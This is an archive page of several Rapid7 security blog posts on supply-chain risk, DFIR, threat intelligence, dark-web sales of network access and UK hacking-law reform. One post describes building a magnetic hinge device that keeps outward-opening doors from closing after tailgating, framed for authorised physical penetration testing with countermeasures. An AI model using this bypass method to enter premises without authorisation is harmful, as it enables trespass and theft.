Tag Archives: Detection and Response

Security at Scale in the Open-Source Supply Chain

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/08/security-at-scale-in-the-open-source-supply-chain/

Security at Scale in the Open-Source Supply Chain

“We’ve all heard of paying it forward, but this is ridiculous!” That’s probably what most of us think when one of our partners or vendors inadvertently leaves an open door into our shared supply-chain network; an attacker can enter at any time. Well, we probably think in slightly more expletive-laden terms, but nonetheless, no organization or company wants to be the focal point of blame from a multitude of (formerly) trusting partners or vendors.

Open-source software (OSS) is particularly susceptible to these vulnerabilities. OSS is simultaneously incredible and incredibly vulnerable. In fact, there are so many risks that can result from largely structuring operations on OSS that vendors may not prioritize patching a vulnerability once their security team is alerted. And can we blame them? They want to continue operations and feed the bottom line, not put a pause on operations to forever chase vulnerabilities and patch them one-by-one. But that leaves all of their supply-chain partners open to exploitation. What to do?

The supply-chain scene

Throughout a 12-month timeframe spanning 2019-2020, attacks aimed at OSS increased 430%, according to a study by Sonatype. It’s not quite as simple as “gain access to one, gain access to all,” but if a bad actor is properly motivated, this is exactly what can happen. In terms of motivation, supply-chain attackers can fall into 2 groups:

  • Bandwagoners: Attackers falling into this group will often wait for public disclosure of supply-chain vulnerabilities.
  • Ahead-of-the-curvers: Attackers falling into this group will actively hunt for and exploit vulnerabilities, saddling the unfortunate organization with malware and threatening its entire supply chain.

To add to the favor of attackers, the same Sonatype study also found that a shockingly low percentage of security organizations do not even learn of new open-source vulnerabilities in the short term after they’re disclosed. Sure, everyone’s busy and has their priorities. But that ethos exists while these vulnerabilities are being exploited. Perhaps the project was shipped on time, but malicious code was simultaneously being injected somewhere along the line. Then, instead of continuing with forward progress, remediation becomes the name of the game.  

According to the Sonatype report, there were more than a trillion open-source component and container download requests in 2020 alone. The most important aspects to consider then are the security history of your component(s) and how dependents along your supply chain are using them. Obviously, this can be overwhelming to think about, but with researchers increasingly focused on remediation at scale, the future of supply-chain security is starting to look brighter.

Learn more about open-source security + win some cash!

Submit to the 2021 Velociraptor Contributor Competition

Securing at scale

Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.

Of course, preventive security measures — inclusive of our shift-left culture — can help to mitigate the need to scale such remediation actions; the fact remains though that bad actors will always find a way. Therefore, until there are effective ways to eliminate large swaths of vulnerabilities at once, there is a growing need for teams to adhere to current best practices and measures like:  

  • Dedicating time and resources to help ensure code is secure all along the chain
  • Thinking holistically about the security of open-source code with regard to the CI/CD lifecycle and the entire stack
  • Being willing to pitch in and develop coordinated, industry-wide efforts to improve the security of OSS at scale
  • Educating outside stakeholders on just how interdependent supply-chain-linked organizations are

As supply-chain attackers refine their methods to target ever-larger companies, the pressure is on developers to refine their understanding of how each and every contributor on a team can expose the organization and its partners along the chain, as The Linux Foundation points out. However, is this too much to put on the shoulders of DevOps? Shifting left to a DevSecOps culture is great and all, but teams are now being asked to think in the context of securing an entire supply chain’s worth of output.

This is why the industry at large must continue the push for research into new ways to eliminate entire classes of vulnerabilities. That’s a seismic shift left that will only help developers — and really, everyone — put more energy into things other than security.

Monitoring mindfully

While a proliferation of OSS components — as advantageous as they are for collaboration at scale — can make a supply chain vulnerable, the power of one open-source community can help monitor another open-source community. Velociraptor by Rapid7 is an open-source digital forensics and incident response (DFIR) platform.

This powerful DFIR tool thrives in loaded conditions. It can quickly scale incident response and monitoring and help security organizations to better prioritize remediation — actions well-suited to address the scale of modern supply-chain attacks. How quickly organizations choose to respond to incidents or vulnerabilities is, of course, up to them.

Supply chain security is ever-evolving

If one link in the chain is attacked via a long-languishing vulnerability whose risk has increasingly become harder to manage, it almost goes without saying that company’s partners or vendors immediately lose confidence in it because the entire chain is now at risk. The public’s confidence likely will follow.

There are any number of preventive measures an interdependent security organization can implement. However, the need for further research into scaling security for whole classes of vulnerabilities comes at a crucial time as global supply-chain attacks more frequently occur in all shapes and sizes.

Want to contribute to a more secure open-source future?

Submit to the 2021 Velociraptor Contributor Competition

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/09/03/cybersecurity-as-digital-detective-work-dfir-and-its-3-key-components/

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Thanks to CSI and the many other crime-solving shows that have grasped our collective imagination for decades, we’re all at least somewhat familiar with the field of forensics and its unique appeal. At some point, anyone who’s watched these series has probably envisioned themselves in the detective’s shoes, piecing together the puzzle of a crime scene based on clues others might overlook — and bringing bad guys to justice at the end.

Cybersecurity lends itself particularly well to this analogy. It takes an expert eye and constant vigilance to stay a step ahead of the bad actors of the digital world. And after all, there aren’t many other areas in the modern tech landscape where the matter at hand is actual crime.

Digital forensics and incident response (DFIR) brings detective-like skills and processes to the forefront of cybersecurity practice. But what does DFIR entail, and how does it fit into your organization’s big-picture incident detection and response (IDR) approach? Let’s take a closer look.

What is DFIR — and are you already doing it?

Security expert Scott J. Roberts defines DFIR as “a multidisciplinary profession that focuses on identifying, investigating, and remediating computer-network exploitation.” If you hear that definition and think, “Hey, we’re already doing that,” that may because, in some sense, you already are.

Perhaps the best way to think of DFIR is not as a specific type of tech or category of tools, but rather as a methodology and a set of practices. Broadly speaking, it’s a field within the larger landscape of cybersecurity, and it can be part of your team’s incident response approach in the context of the IDR technology and workflows you’re already using.

To be good at cybersecurity, you have to be something of a detective — and the detective-like elements of the security practice, like log analysis and incident investigation, fit nicely within the DFIR framework. That means your organization is likely already practicing DFIR at some level, even though you might not have the full picture in place just yet.

3 key components of DFIR

The question is, how do you go from doing some DFIR practices piecemeal to a more integrated approach? And what are the benefits when you do it well? Here are 3 key components of a well-formulated DFIR practice.

1. Multi-system forensics

One of the hallmarks of DFIR is the ability to monitor and query all critical systems and asset types for indications of foul play. Roberts breaks this down into a few core functions, including file-system forensics, memory forensics, and network forensics. Each of these involves monitoring activity for signs of an attack on the system in question.

He also includes log analysis in this category. Although this is largely a tool-driven process these days, a SIEM or detection-and-response solution like InsightIDR can help teams keep on top of their logs and respond to the alerts that really matter.

2. Attack intelligence

Like a detective scouring the scene of a crime for that one clue that cracks the case, spotting suspicious network activity means knowing what to look for. There’s a reason why the person who solves the crime on our favorite detective shows is rarely the rookie and more often the grizzled veteran — a keen interpretative eye is formed by years of practice and skill-building.

For the practice of DFIR, this means developing the ability to think like an attacker, not only so you can identify and fix vulnerabilities in your own systems, but so that you can also spot the signs they’ve been exploited — if and when that happens. A pentesting tool like Metasploit provides a critical foundation for practicing DFIR with a high level of precision and insight.

3. Endpoint visibility

It’s no secret there are now more endpoints in corporate networks than ever before. The huge uptick in remote work during the COVID-19 pandemic has only increased the number and types of devices accessing company data and applications.

To do DFIR well in this context, security teams need visibility into this complex system of endpoints — and a way to clearly organize and interpret data gathered from them. A tool like Velociraptor can be critical in this effort, helping teams quickly collect and view digital forensic evidence from all of their endpoints, as well as proactively monitor them for suspicious activity.

A team effort

The powerful role open-source tools like Metasploit and Velociraptor can have in DFIR reminds us that incident response is a collaborative effort. Joining forces with other like-minded practitioners across the industry helps detection-and-response teams more effectively spot and stop attacks.

Velociraptor has launched a friendly competition to encourage knowledge-sharing within the field of DFIR. They’re looking for useful content and extensions to their open-source platform, with cash prizes for those that come up with submissions that add the most value and the best capabilities. The deadline is September 20, 2021, and there’s $5,000 on the line for the top entry.

Go head-to-head with other digital detectives

Submit to the 2021 Velociraptor Contributor Competition

SANS Experts: 4 Emerging Enterprise Attack Techniques

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/02/sans-experts-4-emerging-enterprise-attack-techniques/

SANS Experts: 4 Emerging Enterprise Attack Techniques

In a recent report, a panel of SANS Institute experts broke down key takeaways and emerging attack techniques from this year’s RSA Security Conference. The long and short of it? This next wave of malicious methodologies isn’t on the horizon — it’s here.

When it comes to supply-chain and ransomware attacks, bad actors seem to have migrated to new ground over the last 2 years. The SANS Institute report found that government, healthcare, and retail (thanks in large part to online spending at the height of the pandemic) were the sectors showing the largest spike from the first quarter of 2020 to this year, in terms of finding themselves in attackers’ crosshairs. As larger incidents increase in frequency, let’s take a look at 4 specific attack formats trending toward the norm and how you can stay ahead of them.

1. Cracks in the facade of software integrity

Developers are under greater pressure to prioritize security (i.e., shift left) within the Continuous Integration/Continuous Delivery (CI/CD) lifecycle. This would seem to be at stark odds with the number of applications built on open-source software (OSS). And, if a security organization is part of a supply chain, how many pieces of OSS are being used at one time along that chain? The potential is huge for an exponential jump in the number of vulnerabilities in that group of interdependent organizations.

There are ways to mitigate these seemingly unstoppable threats. Measures like file integrity monitoring (FIM) surface changes to critical files on your network, alerting you to suspicious activity while also providing context as to the affected users and/or assets. Threat hunting can also help to expose vulnerabilities.

Used with a cloud-native, extended-detection-and-response (XDR) approach, Rapid7’s proactive threat-hunting capabilities leverage multiple security and telemetry sources to act on fine-grained insights and empower teams to quickly take down threats.

2. Do you have a token to get into that session?

Commonly, applications make use of tokens to identify a person wishing to access secure data, like banking information. A user’s mobile app will exchange the token with a server somewhere to verify that, indeed, this is the actual user requesting the information and not an attacker. Improper session handling happens when the protocols according to which these applications are working don’t properly secure identifying tokens.

The issue of improper user authentication was exacerbated by the onslaught of the pandemic, as companies raced to secure — or not — enterprise software for a quickly scaled-up remote workforce. To resolve this issue, individual users can simply make it a best practice to always hit that little “log off/out” button once they’re finished. Businesses can also do this by setting tokens to automatically expire after a predetermined length of time.  

At the enterprise level, security organizations can use a comprehensive application-testing strategy to monitor for weak session handling and nefarious attacker actions like:

  • Guessing a valid session token after only short-term monitoring
  • Using static tokens to target users, even if they’re not logged in
  • Leveraging a token to delete user data without knowing the username/password

3. Turning the machines against us

No, that’s not a Terminator reference. If someone has built out a machine-learning (ML) algorithm correctly, it should do nothing but assist an organization in accomplishing its business goals. When it comes to security, this means being able to recognize traffic patterns that are relatively unknown and classifying them according to threat level.

However, attackers are increasingly able to corrupt ML algorithms and trick them into labeling malicious traffic as safe. Another sophisticated method is for attackers to purchase their own ML products and use them as training grounds to produce and deploy malware. InsightIDR from Rapid7 leverages user-behavior analytics (UBA) to stay ahead of malicious actions against ML algorithms.

Understanding how your ML product functions is key; it should build a baseline of normal user behavior across the network, then match new actions against data gleaned from a combination of machine learning and statistical algorithms. In this way, UBA exposes threats without relying on prior identification in the wild.

4. Ramping up ransomware

Let’s face it: Attackers all over the world are essentially creating repositories and educational platforms in how to evolve and deploy ransomware. It takes sophistication, but ransomware packages are now available more widely to the non-tech set to, for lack of a more apt phrase, plug and play.

As attack methodologies ramp up in frequency and size, it’s not just data at risk anymore. Bad actors are threatening companies with wide public exposure and potentially a catastrophic loss to reputation. But there are opportunities to learn offensive strategies, as well as how attacker techniques can become signals for detection.

Target shifts

If the data in the SANS report tells us anything, it’s that attackers and their evolving methodologies — like those mentioned above — are constantly searching not just for bigger targets and paydays, but also easier paths to their goals.

Targeted industry shifts in year-over-year data show that the company or sector you’re in clearly makes no difference. Perhaps the biggest factor in bad actors’ strategies is the degree of ease with which they get what they want — and some industries still fall woefully behind when it comes to security and attack readiness.

Learn more about the latest threat trends

Read the full SANS report

[The Lost Bots] Episode 4: Deception Technology

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/30/the-lost-bots-episode-4-deception-technology/

[The Lost Bots] Episode 4: Deception Technology

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. This episode is a little different, as it’s Jeffrey talking one-on-one with you about one of his favorite subjects: deception technology! Watch below to learn about the history, special characteristics, goals, and possible roadblocks (with counterpoints!) of what he likes to call “HoneyThings,” and also learn practical advice about the application of this amazing technology.



[The Lost Bots] Episode 4: Deception Technology

Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles insider threats where the threat is definitely inside your organization, but maybe not in the way you think.

[R]Evolution of the Cyber Threat Intelligence Practice

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/08/25/r-evolution-of-the-cyber-threat-intelligence-practice/

[R]Evolution of the Cyber Threat Intelligence Practice

The cyber threat intelligence (CTI) space is one of the most rapidly evolving areas in cybersecurity. Not only are technology and products being constantly updated and evolved, but also methodologies and concepts. One of the key changes happening in the last few years is the transition from threat intelligence as a separate pillar — which disseminates threat reports to the security organization — to threat intelligence as a central hub that feeds all the functions in the security organization with knowledge and information on the most prioritized threats. This change requires a shift in both mindset and methodology.

Traditionally, CTI has been considered a standalone practice within the security organization. Whether the security organization has dedicated personnel or not, it has been a separate practice that produces reports about various threats to the organization — essentially, looking at the threat landscape and making the same threat data accessible to all the functions in the security organization.

Traditional CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
A traditional model of the CISO and the different functions in their security organization

The latest developments in threat intelligence methodologies are disrupting this concept. Effectively, threat intelligence is no longer a separate pillar, but something that should be ingested and considered in every security device, process, and decision-making event. Thus, the mission of the threat intelligence practitioner is no longer to simply create “threat reports,” but also to make sure that every part of the security organization effectively leverages threat intelligence as part of its day-to-day mission of detection, response, and overall risk management.

The evolution of threat intelligence is supported by the following primary trends in the cybersecurity space:

  1. Automation — Due to a lack of trained human resources, organizations are implementing more automation into their security operations. Supported by adoption of SOAR technologies, machine-to-machine communication is becoming much easier and more mainstream. Automation allows for pulling data from your CTI tools and constantly feeding it into various security devices and security processes, without human intervention. Essentially, supporting seamless and near-real-time integration of CTI into various security devices, as well as automated decision-making processes.
  2. Expanded access to threat intelligence — Threat intelligence vendors are investing a lot more in solutions that democratize threat intelligence and make it easy for various security practitioners to consume — for example, native applications for Security Information and Event Management (SIEM) to correlate threat data against internal logs, or browser extensions that inject threat context and risk analysis into the browser. Previously, you had lots of threat data that needed manual labor to review and take action; today, you have actionable insights that are seamlessly integrated into your security devices.

Updated CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
Today’s new model of the CISO and the role of threat intelligence in supporting the different functions in their organization

The new mission of the CTI practitioner

The new mission of the CTI practitioner is to tailor threat intelligence to every function in the security organization and make it an integral part of the function’s operations. This new approach requires them to not only update their mission, but also to gain new soft skills that allow them to collaborate with other functions in the security organization.

The CTI practitioner’s newly expanded mindset and skill set would include:

  1. Developing close relationships with various stakeholders — It’s not enough to send threat reports if the internal client doesn’t know how to consume them. What looks simple for a CTI specialist is not necessarily simple to other security practitioners. Thus, in order to achieve the CTI mission, it’s important to develop close relationships with various stakeholders so that the CTI specialist can better understand their pain points and requirements, as well as tailor the best solution for them to consume. This activity serves as a platform to raise their awareness of CTI’s value, thereby helping them come up with and commit to new processes that include CTI as part of their day-to-day.
  2. Having solid knowledge of the company strategy and operations — The key to a successful CTI program is relevancy; without relevancy, you’re left with lots of unactionable threat data. Relevancy is twice as important when you want to incorporate CTI into various functions within the organization. Relevant CTI can only be achieved when the company business, organizational chart, and strategy are clear. This clarity enables the CTI practitioner to realize what intelligence is relevant to each function and tailor it to the needs of each function.
  3. Deep understanding of the company tech stack — The CTI role doesn’t require only business understanding, but also deep technical understanding of the IT infrastructure and architecture. This knowledge will allow the CTI specialist to tailor the intelligence to the risks imposed on the company tech stack, and it will support building a plan to correlate internal logs against external threat intelligence.

Following are a few examples of processes the threat intelligence team needs to implement in order to tailor threat intelligence to other security functions and make it an integral part of their operations:

  1. Third-party breach monitoring — With the understanding that the weakest link might be your third party, there’s an increasing importance of timely detection of third-party breaches. CTI monitoring supports early detection of those cases and is followed by the IR team minimizing the risk. An example of this is monitoring ransomware gangs’ leak sites for any data belonging to your company that has been leaked from any third party.
  2. SOC incident triage — One of the main missions of the Security Operations Center (SOC) is to identify cyber incidents and make a quick decision on mitigation steps. This can be tremendously improved through threat intelligence information to triage the indicators (e.g., domains and IP addresses) of each event. Threat intelligence is the key to an effective and efficient triage of these events. This can be easily achieved through a threat intelligence browser extension that triages the IOCs while browsing in the SIEM.
  3. Vulnerability prioritization process — The traditional vulnerability prioritization process relies on the CVSS score and the criticality of the vulnerable assets. This focuses the prioritization efforts on the impact of an exploitation of the vulnerabilities and gives very little focus on the probability that these vulnerabilities will be exploited. Hacker chatter from the Dark Web and security researchers’ publications can help provide a good understanding of the probability that a certain vulnerability will actually be leveraged by a threat actor to launch a cyberattack. This probability factor is an essential missing piece in the vulnerability prioritization process.
  4. Trends analysis — The CTI practitioner has access to a variety of sources, allowing them to monitor trends in the cybersecurity domain, their specific industry, or in the data held in the company. This should be provided to leadership (not only security leadership) in order to allow smart, agile decision-making on existing risks.
  5. Threat intel and cybersecurity knowledge sharing — As with “traditional” intelligence, knowledge sharing can be a major force multiplier in cyber intelligence, too. Threat intel teams should aim to create as much external cooperation with other security teams — especially from the industry they work in — as they can. This will allow the team and the security organization to better understand the risks posed to the industry and, accordingly, their company. This information will also allow the CISO better visibility into the threat landscape that’s relevant to the company.

A valuable proposition

While the evolving CTI model is making threat intelligence implementation a bit more complex, as it includes collaboration with different functions, it makes the threat intelligence itself far more valuable and impactful than ever before. The future of cyber threat intelligence is getting a lot more exciting!

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Post Syndicated from Paul Prudhomme original https://blog.rapid7.com/2021/08/24/cybercriminals-selling-access-to-compromised-networks-3-surprising-research-findings/

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Cybercriminals are innovative, always finding ways to adapt to new circumstances and opportunities. The proof of this can be seen in the rise of a certain variety of activity on the dark web: the sale of access to compromised networks.

This type of dark web activity has existed for decades, but it matured and began to truly thrive amid the COVID-19 global pandemic. The worldwide shift to a remote workforce gave cybercriminals more attack surface to exploit, which fueled sales on underground criminal websites, where buyers and sellers transfer network access to compromised enterprises and organizations to turn a profit.

Having witnessed this sharp rise in breach sales in the cybercriminal ecosystem, IntSights, a Rapid7 company, decided to analyze why and how criminals sell their network access, with an eye toward understanding how to prevent these network compromise events from happening in the first place.

We have compiled our network compromise research, as well as our prevention and mitigation best practices, in the brand-new white paper “Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums.”

During the process of researching and analyzing, we came across three surprising findings we thought worth highlighting. For a deeper dive, we recommend reading the full white paper, but let’s take a quick look at these discoveries here.

1. The massive gap between average and median breach sales prices

As part of our research, we took a close look at the pricing characteristics of breach sales in the criminal-to-criminal marketplace. Unsurprisingly, pricing varied considerably from one sale to another. A number of factors can influence pricing, including everything from the level of access provided to the value of the victim as a source of criminal revenue.

That said, we found an unexpectedly significant discrepancy between the average price and the median price across the 40 sales we analyzed. The average price came out to approximately $9,640 USD, while the median price was $3,000 USD.

In part, this gap can be attributed to a few unusually high prices among the most expensive offerings. The lowest price in our dataset was $240 USD for access to a healthcare organization in Colombia, but healthcare pricing tends to trend lower than other industries, with a median price of $700 in this sample. On the other end of the spectrum, the highest price was for a telecommunications service provider that came in at about $95,000 USD worth of Bitcoin.

Because of this discrepancy, IntSights researchers view the average price of $9,640 USD as a better indicator of the higher end of the price range, while the median price is more representative of typical pricing for these sales — $3,000 USD was also the single most common price. Nonetheless, it was fascinating to discover this difference and dig into the reasons behind it.

2. The numerical dominance of tech and telecoms victims

While the sales of network access are a cross-industry phenomenon, technology and telecommunications companies are the most common victims. Not only are they frequent targets, but their compromised access also commands some of the highest prices on the market.

In our sample, tech and telecoms represented 10 of the 46 victims, or 22% of those affected by industry. Out of the 10 most expensive offerings we analyzed, four were for tech and telecommunications organizations, and there were only two that had prices under $10,000 USD. A telecommunications service provider located in an unspecified Asian country also had the single most expensive offering in this sample at approximately $95,000 USD.

After investigating the reasoning behind this numerical dominance, IntSights researchers believe that the high value and high number of tech and telecommunications companies as breach victims stem from their usefulness in enabling further attacks on other targets. For example, a cybercriminal who gains access to a mobile service provider could conduct SIM swapping attacks on digital banking customers who use two-factor authentication via SMS.

These pricing standards were surprisingly expensive compared to other industries, but for good reason: the investment may cost more upfront but prove more lucrative in the long run.

3. The low proportion of retail and hospitality victims

As previously mentioned, we broke down the sales of network access based on the industries affected, and to our surprise, only 6.5% of victims were in retail and hospitality. This seemed odd, considering the popularity of the industry as a target for cybercrime. Think of all the headlines in the news about large retail companies falling victim to a breach that exposed millions of customer credentials.

We explored the reasoning behind this low proportion of victims in the space and came to a few conclusions. For example, we theorized that the main customers for these network access sales are ransomware operators, not payment card data collectors. Payment card data collection is likely a more optimal way to monetize access to a retail or hospitality business, whereas putting ransomware on a retail and hospitality network would actually “kill the goose that lays the golden eggs.”

We also found that the second-most expensive offering in this sample was for access to an organization supporting retail and hospitality businesses. The victim was a third party managing customer loyalty and rewards programs, and the seller highlighted how a buyer could monetize this indirect access to its retail and hospitality customer base. This victim may have been more valuable because, among other things, loyalty and rewards programs are softer targets with weaker security than credit cards and bank accounts; thus, they’re easier to defraud.

Learn more about compromised network access sales

Curious to learn more about the how and why of cybercriminals selling compromised network access? Read our white paper, Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums, for the full story behind this research and how it can inform your security efforts.

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/23/the-lost-bots-bonus-episode-velociraptor-contributor-competition/

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Welcome back for a special bonus edition of The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this extra installment, Jeffrey chats with Mike Cohen, Digital Paleontologist for Velociraptor, an open source endpoint visibility tool that Rapid7 acquired earlier this year.

Mike fills us in on Velociraptor’s very first Contributor Competition, a friendly hackathon-style event that invites entrants to get their hands dirty and build the best extension to the Velociraptor platform that they can. Check out the episode to hear more about the competition, who’s judging, what they’re looking for, and what’s coming your way if you win — spoiler: there’s a cool $5,000 waiting for you if you nab the No. 1 spot, plus a range of other monetary and merchandise prizes. Jeffrey himself even plans to put his name in the ring!



[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Stay tuned for future episodes of The Lost Bots! And don’t forget to start working on your entry for the 2021 Velociraptor Contributor Competition.

[The Lost Bots] Episode 3: Stories From the SOC

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/16/the-lost-bots-episode-3-stories-from-the-soc/

[The Lost Bots] Episode 3: Stories From the SOC

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this third episode, Jeffrey is joined by Stephen Davis, a Technical Lead and Customer Advisor on Rapid7’s Managed Detection and Response team. Stephen shares a story about a phishing attack on an organization, possibly by an advanced persistent threat (APT) — insert spooky “dun dun dun” sound effect — through a malicious Excel document. Watch below to hear about how our MDR team caught this attack, lessons learned, and tips for how teams can stay ahead of these types of threats in their environment.



[The Lost Bots] Episode 3: Stories From the SOC

Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles deception technology — what it is, how you can use it, and why it matters.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Post Syndicated from Ted Raffle original https://blog.rapid7.com/2021/08/13/when-one-door-opens-keep-it-open-a-new-tool-for-physical-security-testing/

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As penetration testers, we spend most of our time working with different types of networks, applications, and hardware devices. Physical security is another fun area we get to work in during physical social engineering penetration tests and red team engagements, which sometimes includes attempts to gain entry into facilities or sensitive areas within them.

Just like when we’re testing a virtual network’s defenses against intruders, pentesters need to put themselves in the mindset of attackers when testing physical security — and that means thinking creatively.

One classic method of gaining physical access is “tailgating,” where you wait for someone else to be going into or coming out of where you want to go, so you can follow them in before a door closes. To help pentesters simulate an attacker who can tailgate without suspiciously hovering around the door, we’ve come up with a neat little device to help with outward-opening doors with ferromagnetic metal frames, like steel entry doors. This tool is one more way pentesters can recreate the thought process of attackers — and help organizations outsmart them.

But first, of course, we want to caution that this is something that should only be used for legitimate purposes, when you have authorization or authority to do so. While we encourage other testers to try this out themselves and use it for customer engagements, this device is patent pending, and we request that you not manufacture, sell, or monetize it.

It’s it! What is it?

We start by placing our little door holder on the door frame, on the side of the door that opens:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

When someone opens the door, it will push the long leaf of the hinge forward:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As the door opens further than the long leaf of the hinge, it falls back down behind the door:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

And while the person who was exiting the door is hopefully on their merry way and not looking back to see if the door will close behind them, our little device will make sure it doesn’t:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

More than one way to peel an orange

We’ve made a few versions of this using lock hasps. Another common hinge with a longer side would be your standard t-hinge. This one was made with a few bar-style neodymium magnets:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

We’ve also made a miniature version using cup-style neodymium magnets:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Important tips

Neodymium magnets can slide around a good bit on smooth surfaces. Putting some grippy tape on the back of the magnet can help keep it from sliding around or scratching paint. Electrical tape and gorilla tape have worked well.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Likewise, having some padding on the leaf that contacts the door is important to prevent it from scratching paint.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Countermeasures

This tool makes it easier to enter a building or secure area by tailgating. By simulating an attacker with a high level of skill and ingenuity, the tool can help reveal weaknesses in organizations’ physical security protocols — and what countermeasures might be more effective.

If you have an electronic access control system, consider configuring it to trigger alerts if a door has been left open for too long. But the best place to start is to make sure your physical security policies and security awareness training educates staff about tailgating, encourages them not to let someone follow them in, and emphasizes making sure that doors close behind them.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Reforming the UK’s Computer Misuse Act

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/12/reforming-the-uks-computer-misuse-act/

Reforming the UK’s Computer Misuse Act

The UK Home Office recently ran a Call for Information to investigate the Computer Misuse Act 1990 (CMA). The CMA is the UK’s anti-hacking law, and as Rapid7 is active in the UK and highly engaged in public policy efforts to advance security, we provided feedback on the issues we see with the legislation.

We have some concerns with the CMA in its current form, as well as recommendations for how to address them. Additionally, because Rapid7 has addressed similar issues relating to U.S. laws — particularly as relates to the U.S. equivalent of the CMA, the Computer Fraud and Abuse Act (CFAA) — for each section below, we’ve included a short comparison with U.S. law for those who are interested.

Restrictions on security testing tools and proof-of-concept code

One of the most concerning issues with the CMA is that it imperils dual-use open-source security testing tools and the sharing of proof-of-concept code.

Section 3A(2) of the CMA states:

(2) A person is guilty of an offence if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, an offence under section 1, 3 or 3ZA.

Security professionals rely on open source and other widely available security testing tools that let them emulate the activity of attackers, and exploiting proof-of-concept code helps organizations test whether their assets are vulnerable. These highly valued parts of robust security testing enable organizations to build defenses and understand the impacts of attacks.

Making these products open source helps keep them up-to-date with the latest attacker methodologies and ensures a broad range of organizations (not just well-resourced organizations) have access to tools to defend themselves. However, because they’re open source and widely available, these defensive tools could still be used by malicious actors for nefarious purposes.

The same issue applies to proof-of-concept exploit code. While the intent of the development and sharing of the code is defensive, there’s always a risk that malicious actors could access exploit code. But this makes the wide availability of testing tools all the more important, so organizations can identify and mitigate their exposure.

Rapid7’s recommendation

Interestingly, this is not an unknown issue — the Crown Prosecution Service (CPS) acknowledges it on their website. We’ve drawn from their guidance, as well as their Fraud Act guidelines, in drafting our recommended response, proposing that the Home Office consider modifying section 3A(2) of the CMA to exempt “articles” that are:

  • Capable of being used for legitimate purposes; and
  • Intended by the creator or supplier of the article to be used for a legitimate purpose; and
  • Widely available; unless
  • The article is deliberately developed or supplied for the sole purpose of committing a CMA offense.

If you’re concerned about creating a loophole in the law that can be exploited by malicious actors, rest assured the CMA would still retain 3A(1) as a means to prosecute those who supply articles with intent to commit CMA offenses.

Comparison with the CFAA

This issue doesn’t arise in the CFAA; however, the U.S. is subject to various export control rules that also restrict the sharing of dual-use security testing tools and proof-of-concept code.

Chilling security research

This is a topic Rapid7 has commented on many times in reference to the CFAA and the Digital Millennium Copyright Act, which is the U.S. equivalent of the UK’s Copyright, Designs and Patents Act 1988.

Independent security research aims to reveal vulnerabilities in technical systems so organizations can deploy better defenses and mitigations. This offers a significant benefit to society, but the CMA makes no provision for legitimate, good-faith testing. While Section 1(1) acknowledges that you must have intent to access the computer without authorization, it doesn’t mention that the motive to do so must be malicious, only that the actor intended to gain access without authorization. The CMA states:

(1) A person is guilty of an offence if—

a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer, or to enable any such access to be secured;

b) the access he intends to secure, or to enable to be secured, is unauthorised; and

c) he knows at the time when he causes the computer to perform the function that that is the case.

Many types of independent security research, including port scanning and vulnerability investigations, could meet that description. As frequently noted in the context of the CFAA, it’s often not clear what qualifies as authorization to access assets connected to the internet, and independent security researchers often aren’t given explicit authorization to access a system.

It’s worth noting that neither the National Crime Agency (NCA) or the CPS seem to be recklessly pursuing frivolous investigations or prosecutions of good-faith security research. Nonetheless, the current legal language does expose researchers to legal risk and uncertainty, and it would be good to see some clarity on the topic.

Rapid7’s recommendation

Creating effective legal protections for good-faith, legitimate security research is challenging. We must avoid inadvertently creating a backdoor in the law that provides a defense for malicious actors or permits activities that can create unintended harm. As legislators consider options on this, we strongly recommend considering the following questions:

  • How do you determine whether research is legitimate and justified? Some considerations include whether sensitive information was accessed, and if so, how much – is there a threshold for what might be acceptable? Was any damage or disruption caused by the action? Did the researcher demand financial compensation from the technology manufacturer or operator?

For example, in our work on the CFAA, Rapid7 has proposed the following legal language to indicate what is understood by “good-faith security research.”

The term “good faith security research” means good faith testing or investigation to detect one or more security flaws or vulnerabilities in software, hardware, or firmware of a protected computer for the purpose of promoting the security or safety of the software, hardware, or firmware.

(A) The person carrying out such activity shall

(i) carry out such activity in a manner reasonably designed to minimize and avoid unnecessary damage or loss to property or persons;

